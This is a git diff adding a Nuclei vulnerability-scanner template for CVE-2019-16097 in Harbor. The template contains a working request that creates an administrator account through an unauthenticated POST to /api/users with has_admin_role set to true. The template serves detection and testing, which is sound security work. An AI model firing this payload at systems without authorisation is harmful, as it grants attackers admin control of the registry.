diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml
new file mode 100644
index 0000000000..250250e759
--- /dev/null
+++ b/cves/2019/CVE-2019-16097.yaml
@@ -0,0 +1,28 @@
+id: CVE-2019-16097
+info:
+  name: Harbor Enables Privilege Escalation From Zero to admin
+  author: pikpikcu
+  severity: critical
+  issues: https://github.com/goharbor/harbor/issues/8951
+  refrence: https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/api/users'
+    headers:
+      Content-Type: application/json
+    body: |
+          {"username": "nuclei", "has_admin_role": true, "password": "NucleiTest!", "email": "zerozero@example.com", "realname": "nuclei"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "username has already been used"
+        part: body
+
+      - type: status
+        status:
+          - 201
+          - 409